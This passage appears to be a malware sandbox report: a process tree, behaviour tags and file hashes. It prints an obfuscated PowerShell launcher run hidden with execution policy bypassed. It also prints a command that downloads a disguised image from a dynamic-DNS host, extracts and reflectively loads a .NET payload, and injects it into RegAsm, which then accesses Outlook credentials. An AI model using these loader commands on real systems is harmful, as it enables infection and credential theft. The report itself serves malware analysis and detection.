₪ ㊎ ㆑LQBn⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑w⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑LQBh⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑ZQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑SQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑ZQB4⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑LQBn⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑HI⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑BJ⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑Hg⫮ ≵ ₪ ㊎ ㆑KQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Hs⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑HI⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑BJ⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑Hg⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑r⫮ ≵ ₪ ㊎ ㆑D0⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bh⫮ ≵ ₪ ㊎ ㆑HI⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑BG⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑YQBn⫮ ≵ ₪ ㊎ ㆑C4⫮ ≵ ₪ ㊎ ㆑T⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑ZwB0⫮ ≵ ₪ ㊎ ㆑Gg⫮ ≵ ₪ ㊎ ㆑Ow⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑YgBh⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑ZQ⫮ ≵ ₪ ㊎ ㆑2⫮ ≵ ₪ ㊎ ㆑DQ⫮ ≵ ₪ ㊎ ㆑T⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑ZwB0⫮ ≵ ₪ ㊎ ㆑Gg⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑9⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑BJ⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑Hg⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑t⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bz⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑YQBy⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑SQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑ZQB4⫮ ≵ ₪ ㊎ ㆑Ds⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑GI⫮ ≵ ₪ ㊎ ㆑YQBz⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑Ng⫮ ≵ ₪ ㊎ ㆑0⫮ ≵ ₪ ㊎ ㆑EM⫮ ≵ ₪ ㊎ ㆑bwBt⫮ ≵ ₪ ㊎ ㆑G0⫮ ≵ ₪ ㊎ ㆑YQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑9⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑G0⫮ ≵ ₪ ㊎ ㆑YQBn⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑V⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑Hg⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑u⫮ ≵ ₪ ㊎ ㆑FM⫮ ≵ ₪ ㊎ ㆑dQBi⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑By⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑bgBn⫮ ≵ ₪ ㊎ ㆑Cg⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bz⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑YQBy⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑SQBu⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑ZQB4⫮ ≵ ₪ ㊎ ㆑Cw⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑GI⫮ ≵ ₪ ㊎ ㆑YQBz⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑Ng⫮ ≵ ₪ ㊎ ㆑0⫮ ≵ ₪ ㊎ ㆑Ew⫮ ≵ ₪ ㊎ ㆑ZQBu⫮ ≵ ₪ ㊎ ㆑Gc⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bo⫮ ≵ ₪ ㊎ ㆑Ck⫮ ≵ ₪ ㊎ ㆑Ow⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑YwBv⫮ ≵ ₪ ㊎ ㆑G0⫮ ≵ ₪ ㊎ ㆑bQBh⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑BC⫮ ≵ ₪ ㊎ ㆑Hk⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑9⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑WwBT⫮ ≵ ₪ ㊎ ㆑Hk⫮ ≵ ₪ ㊎ ㆑cwB0⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑bQ⫮ ≵ ₪ ㊎ ㆑u⫮ ≵ ₪ ㊎ ㆑EM⫮ ≵ ₪ ㊎ ㆑bwBu⫮ ≵ ₪ ㊎ ㆑HY⫮ ≵ ₪ ㊎ ㆑ZQBy⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑XQ⫮ ≵ ₪ ㊎ ㆑6⫮ ≵ ₪ ㊎ ㆑Do⫮ ≵ ₪ ㊎ ㆑RgBy⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑bQBC⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑cwBl⫮ ≵ ₪ ㊎ ㆑DY⫮ ≵ ₪ ㊎ ㆑N⫮ ≵ ₪ ㊎ ㆑BT⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑cgBp⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Zw⫮ ≵ ₪ ㊎ ㆑o⫮ ≵ ₪ ㊎ ㆑CQ⫮ ≵ ₪ ㊎ ㆑YgBh⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑ZQ⫮ ≵ ₪ ㊎ ㆑2⫮ ≵ ₪ ㊎ ㆑DQ⫮ ≵ ₪ ㊎ ㆑QwBv⫮ ≵ ₪ ㊎ ㆑G0⫮ ≵ ₪ ㊎ ㆑bQBh⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑p⫮ ≵ ₪ ㊎ ㆑Ds⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑bwBh⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑ZQBk⫮ ≵ ₪ ㊎ ㆑EE⫮ ≵ ₪ ㊎ ㆑cwBz⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑bQBi⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑eQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑D0⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑Bb⫮ ≵ ₪ ㊎ ㆑FM⫮ ≵ ₪ ㊎ ㆑eQBz⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑ZQBt⫮ ≵ ₪ ㊎ ㆑C4⫮ ≵ ₪ ㊎ ㆑UgBl⫮ ≵ ₪ ㊎ ㆑GY⫮ ≵ ₪ ㊎ ㆑b⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑GM⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑bg⫮ ≵ ₪ ㊎ ㆑u⫮ ≵ ₪ ㊎ ㆑EE⫮ ≵ ₪ ㊎ ㆑cwBz⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑bQBi⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑eQBd⫮ ≵ ₪ ㊎ ㆑Do⫮ ≵ ₪ ㊎ ㆑OgBM⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑YQBk⫮ ≵ ₪ ㊎ ㆑Cg⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bj⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑bQBt⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑bgBk⫮ ≵ ₪ ㊎ ㆑EI⫮ ≵ ₪ ㊎ ㆑eQB0⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑cw⫮ ≵ ₪ ㊎ ㆑p⫮ ≵ ₪ ㊎ ㆑Ds⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑eQBw⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑9⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bs⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑YQBk⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑BB⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑cwBl⫮ ≵ ₪ ㊎ ㆑G0⫮ ≵ ₪ ㊎ ㆑YgBs⫮ ≵ ₪ ㊎ ㆑Hk⫮ ≵ ₪ ㊎ ㆑LgBH⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑BU⫮ ≵ ₪ ㊎ ㆑Hk⫮ ≵ ₪ ㊎ ㆑c⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑Cg⫮ ≵ ₪ ㊎ ㆑JwBk⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑b⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑GI⫮ ≵ ₪ ㊎ ㆑LgBJ⫮ ≵ ₪ ㊎ ㆑E8⫮ ≵ ₪ ㊎ ㆑LgBI⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑bQBl⫮ ≵ ₪ ㊎ ㆑Cc⫮ ≵ ₪ ㊎ ㆑KQ⫮ ≵ ₪ ㊎ ㆑7⫮ ≵ ₪ ㊎ ㆑C⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑J⫮ ≵ ₪ ㊎ ㆑Bt⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bo⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑D0⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑eQBw⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑LgBH⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑BN⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bo⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑o⫮ ≵ ₪ ㊎ ㆑Cc⫮ ≵ ₪ ㊎ ㆑VgBB⫮ ≵ ₪ ㊎ ㆑Ek⫮ ≵ ₪ ㊎ ㆑Jw⫮ ≵ ₪ ㊎ ㆑p⫮ ≵ ₪ ㊎ ㆑C4⫮ ≵ ₪ ㊎ ㆑SQBu⫮ ≵ ₪ ㊎ ㆑HY⫮ ≵ ₪ ㊎ ㆑bwBr⫮ ≵ ₪ ㊎ ㆑GU⫮ ≵ ₪ ㊎ ㆑K⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑k⫮ ≵ ₪ ㊎ ㆑G4⫮ ≵ ₪ ㊎ ㆑dQBs⫮ ≵ ₪ ㊎ ㆑Gw⫮ ≵ ₪ ㊎ ㆑L⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Fs⫮ ≵ ₪ ㊎ ㆑bwBi⫮ ≵ ₪ ㊎ ㆑Go⫮ ≵ ₪ ㊎ ㆑ZQBj⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑WwBd⫮ ≵ ₪ ㊎ ㆑F0⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑o⫮ ≵ ₪ ㊎ ㆑Cc⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑B4⫮ ≵ ₪ ㊎ ㆑HQ⫮ ≵ ₪ ㊎ ㆑LgBI⫮ ≵ ₪ ㊎ ㆑FM⫮ ≵ ₪ ㊎ ㆑T⫮ ≵ ₪ ㊎ ㆑BG⫮ ≵ ₪ ㊎ ㆑C8⫮ ≵ ₪ ㊎ ㆑MQ⫮ ≵ ₪ ㊎ ㆑y⫮ ≵ ₪ ㊎ ㆑DE⫮ ≵ ₪ ㊎ ㆑Lw⫮ ≵ ₪ ㊎ ㆑3⫮ ≵ ₪ ㊎ ㆑DQ⫮ ≵ ₪ ㊎ ㆑MQ⫮ ≵ ₪ ㊎ ㆑u⫮ ≵ ₪ ㊎ ㆑Dk⫮ ≵ ₪ ㊎ ㆑M⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑x⫮ ≵ ₪ ㊎ ㆑C4⫮ ≵ ₪ ㊎ ㆑Mw⫮ ≵ ₪ ㊎ ㆑u⫮ ≵ ₪ ㊎ ㆑DI⫮ ≵ ₪ ㊎ ㆑OQ⫮ ≵ ₪ ㊎ ㆑x⫮ ≵ ₪ ㊎ ㆑C8⫮ ≵ ₪ ㊎ ㆑Lw⫮ ≵ ₪ ㊎ ㆑6⫮ ≵ ₪ ㊎ ㆑H⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑B0⫮ ≵ ₪ ㊎ ㆑Gg⫮ ≵ ₪ ㊎ ㆑Jw⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Cw⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑n⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑ZQBz⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑HY⫮ ≵ ₪ ㊎ ㆑YQBk⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑Jw⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Cw⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑n⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑ZQBz⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑HY⫮ ≵ ₪ ㊎ ㆑YQBk⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑Jw⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑Cw⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑n⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑ZQBz⫮ ≵ ₪ ㊎ ㆑GE⫮ ≵ ₪ ㊎ ㆑d⫮ ≵ ₪ ㊎ ㆑Bp⫮ ≵ ₪ ㊎ ㆑HY⫮ ≵ ₪ ㊎ ㆑YQBk⫮ ≵ ₪ ㊎ ㆑G8⫮ ≵ ₪ ㊎ ㆑Jw⫮ ≵ ₪ ㊎ ㆑s⫮ ≵ ₪ ㊎ ㆑Cc⫮ ≵ ₪ ㊎ ㆑UgBl⫮ ≵ ₪ ㊎ ㆑Gc⫮ ≵ ₪ ㊎ ㆑QQBz⫮ ≵ ₪ ㊎ ㆑G0⫮ ≵ ₪ ㊎ ㆑Jw⫮ ≵ ₪ ㊎ ㆑s⫮ ≵ ₪ ㊎ ㆑Cc⫮ ≵ ₪ ㊎ ㆑Z⫮ ≵ ₪ ㊎ ㆑Bl⫮ ≵ ₪ ㊎ ㆑HM⫮ ≵ ₪ ㊎ ㆑YQB0⫮ ≵ ₪ ㊎ ㆑Gk⫮ ≵ ₪ ㊎ ㆑dgBh⫮ ≵ ₪ ㊎ ㆑GQ⫮ ≵ ₪ ㊎ ㆑bw⫮ ≵ ₪ ㊎ ㆑n⫮ ≵ ₪ ㊎ ㆑Ck⫮ ≵ ₪ ㊎ ㆑KQ⫮ ≵ ₪ ㊎ ㆑g⫮ ≵ ₪ ㊎ ㆑H0⫮ ≵ ₪ ㊎ ㆑I⫮ ≵ ₪ ㊎ ㆑B9⫮ ≵ ₪ ㊎ ㆑⫮ ≵ ₪ ㊎ ㆑==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⫮ ≵ ₪ ㊎ ㆑','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HSLF/121/741.901.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fcdddttthqvgy"5⤵PID:4536
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fcdddttthqvgy"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4392
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\hwiwemevvyotbugz"5⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1708
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\syoofeppjggylbcdcjkl"5⤵PID:2012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\syoofeppjggylbcdcjkl"5⤵PID:4072
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\syoofeppjggylbcdcjkl"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD57f803908e5595ac7805479ffa4f4fc41
SHA142e1ba3a6f437dfcdaa03d714d56e807910fe69b
SHA25637b6b80af283174c508fcb8a5faa0854ba1ab2add391502bbd8e81c18df0ad4d
SHA512a4aff0953c7827d879f94d9503963c04146c94fef8d4183ef1d1479a787339272db362349bdffc4f0235667a9c7daf8a962c8c641c12fd90277e0c4af8dbe04d
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
144B
MD5107519ae76b8081a6a9423cf167fde1e
SHA108dbc36e58115773343995d7f8c191316ed78a20
SHA256ceb7d03d8aafaa22507be49160fef53b9ff5022ea0515cf75c14f9001c91e159
SHA5121af9d10040a805e334c6dcacdb50a964b3be8778d54d7a2410514c24ace99d485c61a7959808b1694632c88c687ac0c25a278f88abfd2859859cdf88f0d6b863